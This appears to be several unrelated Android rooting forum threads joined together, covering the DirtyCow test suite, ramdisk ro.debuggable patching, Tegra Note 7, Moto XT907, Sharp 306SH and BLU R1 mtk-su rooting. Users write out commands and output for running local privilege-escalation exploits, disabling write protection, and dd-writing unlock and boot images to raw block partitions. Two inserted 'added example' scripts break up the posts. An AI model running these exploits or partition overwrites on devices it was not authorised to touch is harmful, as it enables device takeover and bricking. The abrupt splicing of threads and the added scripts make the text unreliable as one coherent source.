Hi guys,
I made a small test suite to test vulnerability to CVE-2016-5195 on Linux-based systems.
This is 99.9% the work of the author of the exploit; I just made some minor changes to turn this into a test suite.
Download: DirtyCow Test-Suite
Important: Activate USB-Debugging to get adb-shell running!
How-to-test:
Code:
Download the test suite from the server above
Unpack the .zip
Attach your device via USB to your PC
./testvuln.sh
If vulnerable, you should see this:
Code:
202 KB/s (10000 bytes in 0.048s)
131 KB/s (5904 bytes in 0.043s)
Running exploit, may take some time
UID=0(root), your device is vulnerable!
Otherwise if not vulnerable something like this:
Code:
140 KB/s (10000 bytes in 0.069s)
133 KB/s (5904 bytes in 0.043s)
Running exploit, may take some time
run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]
Source (you can build it yourself via the NDK):
https://www.androidfilehost.com/?fid=457095661767106997
Hint: Should work on all ARMv8 devices!
As I understand this would give a root adb shell and therefore I could root my Z5 Compact and install SuperSU? I only want to remove some garbage apps without unlocking the bootloader.
tavoc said:
As I understand this would give a root adb shell and therefore I could root my Z5 Compact and install SuperSU? I only want to remove some garbage apps without unlocking the bootloader.
This elevates privileges of a process. If you want a root shell you must do some modifications to the code, but this can potentially root all DirtyCow affected devices.
Thanks, I will have a look at your code. Maybe a GitHub account would be nice for pull requests etc.
tavoc said:
Thanks, I will have a look at your code. Maybe a GitHub account would be nice for pull requests etc.
The best thing you can do is fork this; I made some changes which contradict your desire for a root tool.
So this script is not working under Windows, is that right?
So we can get a root shell? But I don't think we can change the system partition without changing the kernel, right?
Or can we?
My question is: can we root the device with this method?
DannyWilde said:
So this script is not working under Windows, is that right?
For Windows, download the adb tools, copy all binaries to the adb folder and enter the following in a terminal:
Code:
adb push dirtycow /data/local/tmp/dirtycow
adb push run-as /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
adb shell /system/bin/run-as
sijav said:
So we can get a root shell? But I don't think we can change the system partition without changing the kernel, right?
Or can we?
My question is: can we root the device with this method?
1. Yes
2. Yes
3. Yes, potentially
Tommy-Geenexus said:
For Windows, download the adb tools, copy all binaries to the adb folder and enter the following in a terminal:
Code:
adb push dirtycow /data/local/tmp/dirtycow
adb push run-as /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
adb shell /system/bin/run-as
On
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
I get "not found".
On
adb shell /system/bin/run-as
I get "run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]"
The run-as process has only 2 capabilities (setuid/setgid); also, with the SELinux restriction, it cannot exec any shell even after getting elevated privilege ...
super_apache said:
The run-as process has only 2 capabilities (setuid/setgid); also, with the SELinux restriction, it cannot exec any shell even after getting elevated privilege ...
I know. This is not a root tool, this is just to test vulnerability.
Edit: Not sure if this was directed at me or the guy asking the root q, anyway this answers the root q.
Would be nice to have a working root exploit for Marshmallow. Keep us updated please.
To those asking about root (SuperSU), you must remember that with a locked bootloader you can't edit the kernel or system partition.
As said elsewhere, there's no way to "root" without unlocking the BL.
ninestarkoko said:
Would be nice to have a working root exploit for Marshmallow. Keep us updated please.
To those asking about root (SuperSU), you must remember that with a locked bootloader you can't edit the kernel or system partition.
As said elsewhere, there's no way to "root" without unlocking the BL.
This is the wrong thread then. I definitely do not have enough knowledge to get any kind of exploit working.
Best ping your favorite hacker and try to convince him to write an exploit.
ninestarkoko said:
Would be nice to have a working root exploit for Marshmallow. Keep us updated please.
To those asking about root (SuperSU), you must remember that with a locked bootloader you can't edit the kernel or system partition.
As said elsewhere, there's no way to "root" without unlocking the BL.
Have a look at this thread. They managed to root the BLU R1 HD v6
http://forum.xda-developers.com/r1-hd/how-to/blu-r1-hd-v6-6-dirtycowed-f-amazon-root-t3490882/
Tommy-Geenexus said:
This is the wrong thread then. I definitely do not have enough knowledge to get any kind of exploit working.
Best ping your favorite hacker and try to convince him to write an exploit.
Sorry, I misunderstood too. I thought you were planning to use it practically to create an exploit for MM.
I don't think it's necessary as we already have an exploit for LP, though it would be nice.
YuriRM said:
Have a look at this thread. They managed to root the BLU R1 HD v6
http://forum.xda-developers.com/r1-hd/how-to/blu-r1-hd-v6-6-dirtycowed-f-amazon-root-t3490882/
"WARNING UNLOCKING YOUR BOOTLOADER WILL WIPE DATA AND FACTORY RESET THE DEVICE"
they unlock the bootloader using fastboot command
How's everything going here? After reading various threads and Googling for hours, this seems to be the best chance to be able to permanently root the Z5 Compact with a locked bootloader.
Really hope you're onto something and are well rested after Christmas
wessok said:
How's everything going here? After reading various threads and Googling for hours, this seems to be the best chance to be able to permanently root the Z5 Compact with a locked bootloader.
Really hope you're onto something and are well rested after Christmas
Googling for hours and didn't understand a simple sentence (in my post above) or the technical reasons behind it (in many threads)? Stop your search now, unlock it and live happily.
Discovering "adb shell" gave joy, experiencing the shell as minimal bash with awful line handling (backspace and command recall) gave annoyance, experiencing "adb root" refusing access gave frustration.
After some tracking, it turns out that adbd behaviour is determined by the property "ro.debuggable" which is set during system init. The initial value is located in the file "/default.prop". In JP6 it is set to 0, resulting in adbd refusing access. However, set to 1, "adb root" will give the much better response of "restarting adbd as root".
Once set, the property value cannot be changed. To get this fixed you need to change the contents of the file default.prop which is located in the initial ramdisk image.
Optionally, you can put a replacement shell in /sbin of the ramdisk image so that when connected, "exec bash" will make things more relaxing. I attached the version I am using, which is statically linked with ncurses/readline.
There is also a simple patch to unlock adbd if you dislike opening and rebuilding the ramdisk image. However, you do need binoffset which is located in the scripts directory of the linux source tree.
Code:
# locate the byte offset of 'debuggable=0' in the ramdisk; binoffset takes the
# needle as a list of decimal byte values, which od -t u1 -An produces
ofs=$(scripts/binoffset initramfs.cpio $(printf 'debuggable=0' | od -t u1 -An) 2>/dev/null)
# overwrite it in place with a same-length value so the cpio headers stay valid;
# printf rather than echo so no trailing newline is written past the property
printf 'debuggable=1' | dd bs=1 seek="$ofs" conv=notrunc of=initramfs.cpio
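A variant of the same in-place patch that does not need the kernel tree's binoffset, added here as an example and not part of the original post: it locates ro.debuggable=0 with grep's byte-offset output instead, refuses to write anything if the property is not present, and overwrites it with a value of identical length so the cpio file sizes and header checksums stay valid. It assumes an uncompressed cpio (gunzip a gzipped ramdisk first) and GNU grep/dd; the function names are mine.

```shell
#!/bin/sh
# Added example: flip ro.debuggable=0 to 1 inside a raw (uncompressed) cpio ramdisk.
# Assumes GNU grep (-o -b prints the byte offset of each match) and GNU/BusyBox dd.
# The replacement is the same length as the original, so cpio headers are untouched.

# Report the current value (0/1) of ro.debuggable in the image, or 2 if absent.
debuggable_value() {
    val=$(LC_ALL=C grep -oa 'ro.debuggable=[01]' "$1" | head -n 1 | cut -d= -f2)
    if [ -n "$val" ]; then echo "$val"; else echo 2; fi
}

# Patch ro.debuggable=0 -> ro.debuggable=1 in place; returns 1 if not found.
patch_debuggable() {
    img="$1"
    # -a: treat binary as text, -o: print only the match, -b: prefix it with the
    # byte offset, -F: literal pattern. LC_ALL=C keeps offsets in bytes.
    ofs=$(LC_ALL=C grep -obaF 'ro.debuggable=0' "$img" | head -n 1 | cut -d: -f1)
    if [ -z "$ofs" ]; then
        echo "patch_debuggable: ro.debuggable=0 not found in $img" >&2
        return 1
    fi
    # printf (not echo) so no trailing newline is written past the property value.
    printf 'ro.debuggable=1' | dd bs=1 seek="$ofs" conv=notrunc of="$img" 2>/dev/null
    echo "patched ro.debuggable at byte offset $ofs"
}

# Stand-alone use: sh patch_debuggable.sh initramfs.cpio
if [ $# -eq 1 ]; then
    patch_debuggable "$1" && echo "ro.debuggable is now $(debuggable_value "$1")"
fi
```

After patching, repack the ramdisk the same way it was unpacked; a gzip-compressed image must be recompressed, since the byte patch only makes sense on the raw cpio.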
Thanks...any help though?
Hi....thanks for the fix....could you point me to a decent howto on editing the initial ramdisk?
Thanks
M
It doesn't sound simple.
I will try to figure that one out ...
Dear Hexabit,
I know it's an old topic,
but do you know how I can use this fix on Windows 7?
I tried searching for the binoffset software/script... couldn't find anything.
I have a Flytouch 3 tablet, rooted (Z4) with terminal emulator and root explorer.
Is there a way to use your bash.rar to unlock adb access?
Thanks for the help
doekoe87 said:
Dear Hexabit,
I know it's an old topic,
but do you know how I can use this fix on Windows 7?
I tried searching for the binoffset software/script... couldn't find anything.
I have a Flytouch 3 tablet, rooted (Z4) with terminal emulator and root explorer.
Is there a way to use your bash.rar to unlock adb access?
Thanks for the help
You have to split the kernel, then decompile the ramdisk and edit default.prop and change ro.debuggable to 1, then recompile and flash.
Confusing, but it gives me a clue.
I use unpackbootimg in my ubuntu pc.
adb root does not work properly after setting debuggable=1.
When I saw your thread that told the adbd should be unlocked too, then I replace the adbd with a unlocked one. It works!
Thanks for your help.
I am sorry but I don't understand how to use the file.
teoking said:
I use unpackbootimg in my ubuntu pc.
adb root does not work properly after setting debuggable=1.
When I saw your thread that told the adbd should be unlocked too, then I replace the adbd with a unlocked one. It works!
Thanks for your help.
Hi,
I can upload nothing to the root directory of my phone.
So how could I use the adbd file in this case?
The phone is rooted, but I have a problem with the adb root command, as in the subject of this topic.
Can you help me with the process? Because I put the file in /sbin but it's still not working.
Active system
Sent from my SM-G900T3 using Tapatalk
EDIT:
Go here to root your Tegra Note 7: https://github.com/linux-shield/shield-root/blob/master/README.md (thanks to CampGareth for finding the link).
I have tested this; it works with no bloatware, only installs SuperSU.
---------
Hey guys, I got my new Tegra Note 7 last night and I've been trying to get it rooted, but I keep running into trouble.
First of all, I DO NOT want to use some shady Chinese software that installs a bunch of bloat on both my tablet and PC just to get SuperSu going, I've tried that method and had to reset the tablet to get rid of all the crap it installs (and it didn't even seem to root anyway).
Now I'm trying the manual method from here: http://pan.baidu.com/wap/link?uk=3073396937&shareid=3129426036&third=0
Which, again, is Chinese but at least I can see what it's doing since I'm issuing ADB commands, and supposedly it has worked for others on this forum.
Now, I get to step 3 on the included PDF which says to boot an insecure bootloader image with "fastboot boot tegranote_insecure_boot.img", I do this and the tablet screen flashes a few times and reboots to android.
I get to the next step which says to open an adb shell, and do "/sbin/rootsh +p" to get a temp root shell, and this is where I get stuck. Instead of getting a root shell I get the message "/system/bin/sh: /sbin/rootsh: not found". Does anyone have suggestions?
By the way we really need a Tegra Note 7 subforum here at XDA, if the mods could add it that would be great.
dark42 said:
Hey guys, I got my new Tegra Note 7 last night and I've been trying to get it rooted, but I keep running into trouble.
First of all, I DO NOT want to use some shady Chinese software that installs a bunch of bloat on both my tablet and PC just to get SuperSu going, I've tried that method and had to reset the tablet to get rid of all the crap it installs (and it didn't even seem to root anyway).
Now I'm trying the manual method from here: http://pan.baidu.com/wap/link?uk=3073396937&shareid=3129426036&third=0
Which, again, is Chinese but at least I can see what it's doing since I'm issuing ADB commands, and supposedly it has worked for others on this forum.
Now, I get to step 3 on the included PDF which says to boot an insecure bootloader image with "fastboot boot tegranote_insecure_boot.img", I do this and the tablet screen flashes a few times and reboots to android.
I get to the next step which says to open an adb shell, and do "/sbin/rootsh +p" to get a temp root shell, and this is where I get stuck. Instead of getting a root shell I get the message "/system/bin/sh: /sbin/rootsh: not found". Does anyone have suggestions?
By the way we really need a Tegra Note 7 subforum here at XDA, if the mods could add it that would be great.
I would recommend the following procedure:
1. Download the root_tool_v2.zip attached to this post
2. Unzip the contents the root_tool_v2.zip to a directory
3. Run the following commands from your ADB and Fastboot directory:
Code:
adb reboot bootloader
fastboot boot tegranote_insecure_v2.img
4. Once your device finishes booting the insecure boot.img (Your device's screen will blink several times and then boot into Android) run the following commands:
Code:
adb shell
mount -o remount,rw /dev/block/mmcblk0p5 /system
exit
adb push su /system/xbin/su
adb push Superuser.apk /system/app/Superuser.apk
adb shell
chmod 6755 /system/xbin/su
chmod 644 /system/app/Superuser.apk
mount -o remount,ro /dev/block/mmcblk0p5 /system
exit
adb reboot
5. You should now have Superuser installed and have root access.
What I did was modify the boot.img provided to be insecure and use an insecure adbd binary to allow a root shell when booted, which can then be used to set up Superuser and su binary access. Let me know how this goes for you and if you have any questions.
Wow, thanks for the help! Unfortunately your attachment seems to be corrupt, I can't decompress the archive. I'm using 7-zip btw. The forum says your attachment is 7.19MB but when downloaded it's only 160KB.
If you can re-upload it I will give it a go.
A reup of the file would be much appreciated!
PS
I have a batch file to expedite the process.
dark42 said:
Wow, thanks for the help! Unfortunately your attachment seems to be corrupt, I can't decompress the archive. I'm using 7-zip btw. The forum says your attachment is 7.19MB but when downloaded it's only 160KB.
If you can re-upload it I will give it a go.
dergezero said:
A reup of the file would be much appreciated!
PS
I have a batch file to expedite the process.
Re-uploaded the file for you guys, let me know how it goes for you.
Awesome your new package downloaded fine.
However, I'm still not getting root; I got to step 4 and when I open an adb shell I don't have permissions for the next command.
The exact error message:
[email protected]:/ mount -o remount,rw /dev/block/mmcblk0p5 /system
mount -o remount,rw /dev/block/mmcblk0p5 /system
mount: Operation not permitted
So I guess the insecure boot image didn't work right. I should mention that I am using the latest Tegra Note firmware, I don't know if that makes a difference though. Any ideas?
Thanks for your help so far.
Do you guys have a copy of the drivers for the tablet? Mine only seems to work for storage.
Update: got drivers working.
dergezero said:
Do you guys have a copy of the drivers for the tablet? Mine only seems to work for storage.
Update: got drivers working.
I used Universal Naked Driver 0.73, I just manually installed the driver for the Nvidia Shield, thinking it would work, and it does!
Does shimp208's root image work for you, dergezero?
dark42 said:
I used Universal Naked Driver 0.73, I just manually installed the driver for the Nvidia Shield, thinking it would work, and it does!
Does shimp208's root image work for you, dergezero?
No, it just reboots. Neither is working. I'm going to see if anyone can give us a dump of their img that already works to be rooted. I tried that Chinese method and it's really annoying and I don't get root on any computer I try it on.
Hey guys I am in the process of creating a new boot image that uses a different method for gaining root access and will upload that once I finish it.
shimp208 said:
Hey guys I am in the process of creating a new boot image that uses a different method for gaining root access and will upload that once I finish it.
Awesome man, good luck! Eager to try it when you post it!
dark42 said:
Awesome man, good luck! Eager to try it when you post it!
I agree, with the amount of malware that is in the Chinese root tools, it makes me nervous to use the one the OP posted.
Brew
I wonder if someone would be able to port Clockworkmod Recovery to the TN7 eventually. The bootloader on this device is factory unlocked so it should be simple enough. Unfortunately I'm not a good enough programmer to get this done.
If we had Clockworkmod then rooting would be as easy as flashing the SuperSU .zip from the SD.
I have updated my original post with the rooting instructions to include a new insecure boot method; follow the same instructions as before, just use the new boot.img I uploaded to that post. Credit to teknoraver for the insecure adbd binary.
shimp208 said:
I have updated my original post with the rooting instructions to include a new insecure boot method; follow the same instructions as before, just use the new boot.img I uploaded to that post. Credit to teknoraver for the insecure adbd binary.
I tried your V2 image, still getting permission errors when doing "mount -o remount,rw /dev/block/mmcblk0p5 /system", what am I doing wrong?
dark42 said:
I tried your V2 image, still getting permission errors when doing "mount -o remount,rw /dev/block/mmcblk0p5 /system", what am I doing wrong?
When you boot the image and then type ADB shell do you get a root shell ([email protected]:/ #) or just a regular shell ([email protected]:/ $)?
Amazing
Nice to see you working on a different method of root... I am sorry to those who feel that the method I posted is getting negative reviews; I just wanted to throw something out there for people. However, I do feel much better with shimp208 working on a better root method. I really wish we could get a forum going..
I used the Chinese root tool and all seems fine on my Tegra note
Sent from my TegraNote-P1640 using Tapatalk
shimp208 said:
When you boot the image and then type ADB shell do you get a root shell ([email protected]:/ #) or just a regular shell ([email protected]:/ $)?
Just a regular shell with $. Doesn't look like I get temp root permissions after running the tegranote_insecure_v2.img.
If it matters, I'm on the latest Stock ROM (4.2.2/JDQ39.13155_268.1942) and I'm using Universal Naked Driver 0.73 for the Shield, which works with this device. Maybe I need to use a different driver?
Toyeboy said:
I used the Chinese root tool and all seems fine on my Tegra note
Sent from my TegraNote-P1640 using Tapatalk
Yeah, it works, but you don't really know what was installed on your phone or on your PC. 3 apps are installed on your phone, and a few registry changes on your PC can be detrimental. And it's all bloatware.
I'm curious if there is any way to push "su" to the system?
I mean, c'mon, there are plenty of KitKat 4.4.2 fastboot files.
I have tried pushing "su" manually with the "pwn" exploit.
Tried with the following exploits:
-psneuter
-pwn
but no luck there.
Anyone, please... I'm dying here..
Our system details:
- LOCKED BOOTLOADER
- KitKat 4.4.2
- Blur_Version.183.46.10.XT907.Verizon.en.US ( KDA20.62-10.1 )
What I tried is
Code:
adb devices
adb push pwn /data/local/tmp
adb shell
$ cd /data/local/tmp
$ chmod 777 pwn
$ ./pwn
( NO LUCK GETTING PERMISSION AFTER $ ./pwn )
At this point, the exploit will run and close the shell. You will need to run these commands to restart the ADB server.
adb kill-server
adb devices
Now comes the moment of truth. Use the
adb shell
command to open a shell. If you see a "#" sign, you have root access, so go ahead and continue to the next part.
If not, you can go back and try the previous steps again
We now need to make this root permanent. From the root shell you just opened, type the following commands.
# mount -o remount,rw -t rfs /dev/block/st19 /system
# exit
adb push busybox /system/bin
adb push su /system/bin
adb install Superuser.apk
adb shell
# chmod 4755 /system/bin/busybox
# chmod 4755 /system/bin/su
# mount -o remount,ro -t rfs /dev/block/st19 /system
# exit
adb reboot
Guys, let's make this happen anyhow... let's roll...
Even this won't work:
http://www.kingoapp.com/
Every root method I've ever found for KK requires an unlocked bootloader, and I'm talking about looking outside the box at all different brands/models of phones too. I guess Google finally figured how to lock things up as well as Apple. I've read XDA user "jcase" had discovered a KK exploit that works on some Motorolas, but he's keeping it secret for some mysterious reason and will be presenting it at a Black Hat conference. Why anyone would rather help companies than consumers is beyond my comprehension, but it is what it is.
GnatGoSplat said:
Every root method I've ever found for KK requires an unlocked bootloader, and I'm talking about looking outside the box at all different brands/models of phones too. I guess Google finally figured how to lock things up as well as Apple. I've read XDA user "jcase" had discovered a KK exploit that works on some Motorolas, but he's keeping it secret for some mysterious reason and will be presenting it at a Black Hat conference. Why anyone would rather help companies than consumers is beyond my comprehension, but it is what it is.
Every exploit has two sides to it: it can be used more or less legitimately by users to obtain root privileges, but it can be also abused by rogue apps to gain control over someone else's device.
When you find an exploit, the sooner you publish it, the sooner it will be patched in a firmware update, making it unusable any more for gaining root privileges. And since you've published it, the bad guys can make their use of it as well.
Patching existing vulnerabilities by companies is natural and essentially made in favour of user's safety.
The specific timing of releasing details about some found vulnerability can be part of a tactic - you can give users a window for gaining root just after a specific expected firmware release for some device. If an exploit is published too soon, it will be patched in an upcoming firmware update and no one will be able to use it for rooting...
Means that there is a possible way, of course, but the thing is whether it can be found or not......
Of course, for good reasons.......
So I'll update randomly...
boot.img and recovery.img -> https://drive.google.com/file/d/0B5QYBzdG6RuyZy1TSHc2VDVhY2M/view?usp=sharing
temp root:
Code:
adb push root /data/local/tmp
adb push wpoff /data/local/tmp
adb push fbunlock /data/local/tmp
adb push recovery.img /data/local/tmp
adb push boot.img /data/local/tmp
adb shell
$ chmod 755 /data/local/tmp/root
$ chmod 755 /data/local/tmp/wpoff
$ chmod 755 /data/local/tmp/fbunlock
$ /data/local/tmp/root
...
#
defeat WP:
Code:
# /data/local/tmp/wpoff --unprotect-all
check WP status(optional):
Code:
# /data/local/tmp/wpoff --dump
If you see it's all zeroes there it means good, or if there are many 5555 it means NG.
unlock bootloader:
Code:
# /data/local/tmp/fbunlock
install TWRP and patched boot:
Code:
# dd if=/data/local/tmp/recovery.img of=/dev/block/platform/msm_sdcc.1/by-name/recovery
# dd if=/data/local/tmp/boot.img of=/dev/block/platform/msm_sdcc.1/by-name/boot
install SuperSU:
Code:
FLASH SUPERSU LIKE OLD DAYS
Why patch boot?
Because MIYABI stops ptrace, some apps that depend on it won't work properly.
Chinese here:
Reposting to domestic forums is prohibited; commercial use is prohibited. There won't be one for the Japanese version.
Note:
a. Remember to rename recovery.00X.zip to recovery.zip.00X before unzipping!
b. If you don't flash boot.img before installing SuperSU, you will end up in a boot loop. To recover, delete /system/xbin/daemonsu.
Attachments will be uploaded soon.
Hi tewilove, many thanks for publishing this. Amazing work! And a big time saver.
tewilove, thanks a lot!!
Hey, does someone know how I can put su inside system and then use SuperSU?
Thank you a lot.
Thanks, but I cannot use root apps and SuperSU cannot install the su binary.
Thank you for your help.
tewilove said:
Tested with a 306SH with SW version S4081.
How to:
https://youtu.be/UJs7ruckGgc
This is v1, since the shell code has to be improved yet (WIP).
It only obtains temp root with kernel context. The remaining things are changing to init context, disabling mmc_protect_part, disabling the miyabi LSM.
There might be a v2, which solves all of the above, if I have time.
And it also works with many other devices.
For example, 305SH, MI4C, SH-01G.
If it keeps crashing, it should be my hard-coded offsets.
PS: Please don't reshare this thread.
PS: Chinese: Please do not repost to Tieba or forums, thanks.
Thank you for your help; thanks to a certain Inaba (因幡) for sharing.
Please, I'd like to know how you did that. Could you be more clear, a step by step maybe?
Sent from my D6616 using XDA Free mobile app
salmanaman said:
Please I'd like to know how you did that.could you be more clear, a step by step maybe?
Sent from my D6616 using XDA Free mobile app
You can watch the video that tewilove made for us... but we need to wait until someone unlocks the protection, because after you restart the phone root will disappear..
tewilove said:
Tested with a 306SH with SW version S4081.
How can I know that I got the temporary root? Is this step in the input ID?
All steps work on my 305SH like the YouTube video, but SuperSU is not working and Root Checker says not rooted.
soudara said:
All steps work on my 305SH like the YouTube video, but SuperSU is not working and Root Checker says not rooted.
Yes, we know about this... I tried to remount system (with this command: busybox mount -o remount,rw /system) to get permission, but my device restarts when I try... maybe it's from this write protection that @tewilove told us about... if he can tell us how we can install su in system, if it's possible for now...?
OK, so for the moment it is useless?
soudara said:
All steps work on my 305SH like the YouTube video, but SuperSU is not working and Root Checker says not rooted.
Me too. Maybe just kernel root??
loonbg said:
Yes, we know about this... I tried to remount system (with this command: busybox mount -o remount,rw /system) to get permission, but my device restarts when I try... maybe it's from this write protection that tewilove told us about... if he can tell us how we can install su in system, if it's possible for now...?
Yeah, Root Explorer and Xposed said no root.
I don't think that folks are understanding what "temp" root means. This solution allows you to achieve root for the current shell session. This does not install the additional binaries to allow other applications to use root access.
With that being said, I am wondering if we can use this temporary elevated access to correct the vulnerability outlined in CVE-2015-1474 affecting /system/lib/libui.so that Sharp has neglected to address in previous OTA updates. The only "corrected" libui.so that I have been able to locate was compiled for v5.0.1 so I am afraid that file would not be compatible with this earlier version of Android on the 306SH. I am not really savvy with in depth programming to be able to fully investigate this and develop a viable solution... anyone who would be able to point me in the right direction would receive many thanks. :banghead:
My apologies if this should have been posted in a separate thread.
Awesome! It worked on my 306SH, with root permission acquired in the shell.
Can you use root apps and install SuperSU?
Write protection is keeping us from remounting /system as rw. This prevents us from doing anything that would have any type of impact on the current situation. I want to experiment with attempting to mount partitions with the device powered off... but my device is encrypted so I am unable to access the shell with device off until I perform a factory reset. I am planning on doing that tonight so hopefully I will be able to report back with more information soon.
Sent from my 306SH
soudara said:
Can you use root apps and install SuperSU?
No. We are working on it though.
On another note, I can't get this temp root to work.
Video of what happens is linked. (too large to attach)
https://mega.co.nz/#!blNTjbhS!p2ljioY_43xlWkpu3EWpj8LvfMVP5eushZT23KLPASk
TechInMD said:
Write protection is keeping us from remounting /system as rw.
So I assume, from the quoted text, you have tried mounting /system as rw while in the temp root shell session?
Yes. I tried using the mount command both directly from the root shell prompt plus I tried using busybox to mount also. There seem to be slight variations between them. Also, not sure if it is relevant but I attempted it both through adb and in terminal on the device. I can get to the root prompt but not further.
Sent from my 306SH
A public service announcement.
A new tool (mtk-su) by @diplomatic (link) is able to achieve a temporary yet full featured root shell on any OS version for the original BLU R1 (and most likely, on BLU R1 PLUS), see this post for proof. Use mtk-su_r11.zip, version in armv7-kernel folder, and you will get a rooted shell. To install permanent root, you will need to unlock your bootloader.
Perhaps @mrmazak would be kind enough to update his R1 bootloader unlock tool to all OS versions. It should be possible to update the bootloader unlock for R1 PLUS up to the latest OS version (@lopestom), given that there is now a full featured root shell with rw system access.
bibikalka said:
A public service announcement.
A new tool (mtk-su) by @diplomatic (link) is able to achieve a temporary yet full featured root shell on any OS version for the original BLU R1 (and most likely, on BLU R1 PLUS), see this post for proof. Use mtk-su_r11.zip, version in armv7-kernel folder, and you will get a rooted shell. To install permanent root, you will need to unlock your bootloader.
Perhaps @mrmazak would be kind enough to update his R1 bootloader unlock tool to all OS versions. It might also be possible to accomplish bootloader unlock for R1 PLUS, given that there is now a full featured root shell.
Since you have your R1 powered up already, can you let me know if that temp root shell gives access to /dev/block?
As in, can you test if a dd command to /dev/block is allowed? If it is, then this will make a nice replacement for the dirty-cow method..
mrmazak said:
Since you have your R1 powered up already, can you let me know if that temp root shell gives access to /dev/block?
As in, can you test if a dd command to /dev/block is allowed? If it is, then this will make a nice replacement for the dirty-cow method..
Yep, seems to work OK:
Code:
[email protected]_HD:/data/local/tmp $ ./mtk-su_arm7 -v
armv7l machine
param1: 0x1000, param2: 0x8040, type: 7
Building symbol table
...
New UID/GID: 0/0
starting /system/bin/sh
[email protected]_HD:/data/local/tmp # dd if=/dev/block/mmcblk0p7 of=/sdcard/p7t.bin
32768+0 records in
32768+0 records out
16777216 bytes transferred in 3.630 secs (4621822 bytes/sec)
This is way better than DirtyCow !
bibikalka said:
Yep, seems to work OK:
Code:
[email protected]_HD:/data/local/tmp $ ./mtk-su_arm7 -v
armv7l machine
param1: 0x1000, param2: 0x8040, type: 7
Building symbol table
...
New UID/GID: 0/0
starting /system/bin/sh
[email protected]_HD:/data/local/tmp # dd if=/dev/block/mmcblk0p7 of=/sdcard/p7t.bin
32768+0 records in
32768+0 records out
16777216 bytes transferred in 3.630 secs (4621822 bytes/sec)
This is way better than DirtyCow !
That seems so simple.
Changed the dirty-cow section of the tool to use this mtk-su,
and based on what the read-me says, this command should work as an all-in-one.
Code:
example based on file name used in tool
adb shell "/data/local/tmp/mtk-su -c dd if=/data/local/tmp/unlock of=/dev/block/mmcblk0p17"
can you test it?
Code:
adb push mtk-su /data/local/tmp/mtk-su
adb shell chmod 0777 /data/local/tmp/mtk-su
adb shell "/data/local/tmp/mtk-su -c dd if=/dev/block/mmcblk0p7 of=/sdcard/p7t.bin"
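As an added example (not mrmazak's tool or any script from this thread), here is a small wrapper around the dd-to-/dev/block step above that adds the two checks a practitioner wants before and after overwriting a partition: it refuses to write an image larger than the target, and after dd it reads the written bytes back and compares them with the source. It assumes a root shell (for example via mtk-su -c), GNU/toybox dd, head and cmp, and blockdev for block-device sizes; the paths in the usage comment are the ones used in the post, and the function names are mine.

```shell
#!/bin/sh
# Added example: write an image to a raw partition only after a size sanity check,
# then read it back and compare. Run from a root shell, e.g. under mtk-su -c:
#   sh flash_verify.sh /data/local/tmp/unlock /dev/block/mmcblk0p17

# Size in bytes of a block device (blockdev) or a regular file (wc).
target_size() {
    if [ -b "$1" ]; then
        blockdev --getsize64 "$1"
    else
        wc -c < "$1"
    fi
}

# flash_verify SRC DST: refuse if SRC is larger than DST; after dd, read back
# the first size(SRC) bytes of DST and compare them with SRC.
# Returns 0 on verified success, 1 on a refused/failed write, 2 on mismatch.
flash_verify() {
    src="$1"; dst="$2"
    [ -f "$src" ] || { echo "source $src missing" >&2; return 1; }
    [ -e "$dst" ] || { echo "target $dst missing" >&2; return 1; }
    ssz=$(wc -c < "$src")
    dsz=$(target_size "$dst")
    if [ "$ssz" -gt "$dsz" ]; then
        echo "refusing: $src ($ssz bytes) larger than $dst ($dsz bytes)" >&2
        return 1
    fi
    # conv=notrunc keeps the rest of the target untouched (matters for files,
    # harmless for block devices); sync pushes the write out of the page cache
    dd if="$src" of="$dst" conv=notrunc 2>/dev/null || return 1
    sync
    if head -c "$ssz" "$dst" | cmp -s - "$src"; then
        echo "verified $ssz bytes written to $dst"
        return 0
    fi
    echo "verification FAILED for $dst" >&2
    return 2
}

if [ $# -eq 2 ]; then
    flash_verify "$1" "$2"
fi
```

Before the first real write, dump the target partition the same way the post dumps mmcblk0p7 (dd if=/dev/block/... of=/sdcard/...) so the write can be reverted with the same wrapper if the device misbehaves.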
mrmazak said:
That seems so simple.
Changed the dirty-cow section of the tool to use this mtk-su,
and based on what the read-me says, this command should work as an all-in-one.
Code:
example based on file name used in tool
adb shell "/data/local/tmp/mtk-su -c dd if=/data/local/tmp/unlock of=/dev/block/mmcblk0p17"
can you test it?
Code:
adb push mtk-su /data/local/tmp/mtk-su
adb shell chmod 0777 /data/local/tmp/mtk-su
adb shell "/data/local/tmp/mtk-su -c dd if=/dev/block/mmcblk0p7 of=/sdcard/p7t.bin"
Just tested the last bit of code, all worked properly! Ended up reading mmcblk0p7 as expected! So please proceed.
bibikalka said:
Just tested the last bit of code, all worked properly! Ended up reading mmcblk0p7 as expected! So please proceed.
I think it is ready.
The biggest unknown part is whether it works on V9.x.
We assume the only change made was the kernel patch that blocked dirty-cow. What if the bootloader has the unlock codes removed?
Anyhow, I put it up on the unlock thread, and it needs a tester.
mrmazak said:
I think it is ready.
The biggest unknown part is whether it works on V9.x.
We assume the only change made was the kernel patch that blocked dirty-cow. What if the bootloader has the unlock codes removed?
Anyhow, I put it up on the unlock thread, and it needs a tester.
Well, it's not like the bootloader is set in stone. You can overwrite any /dev/block, so if there are issues, why not return all the stuff, preloader and bootloaders, to V6.6? Then even the MTK tool would work. I don't recall there was anti-rollback protection implemented. I guess your tool tries to be the least invasive, but the full featured root gives options for a total downgrade.
bibikalka said:
Well, it's not like the bootloader is set in stone. You can overwrite any /dev/block, so if there are issues, why not return all the stuff, preloader and bootloaders, to V6.6? Then even the MTK tool would work. I don't recall there was anti-rollback protection implemented. I guess your tool tries to be the least invasive, but the full featured root gives options for a total downgrade.
One of the options in the tool is to roll back the preloader.
Did that long ago.
Didn't try with shell, only with TWRP. Similar to the way the OTA changed it, and it requires you to unlock again, but it has been a repeatable process.
Would this work with the R1 HD from Amazon?
Hey guys, looking for a little bit of help.
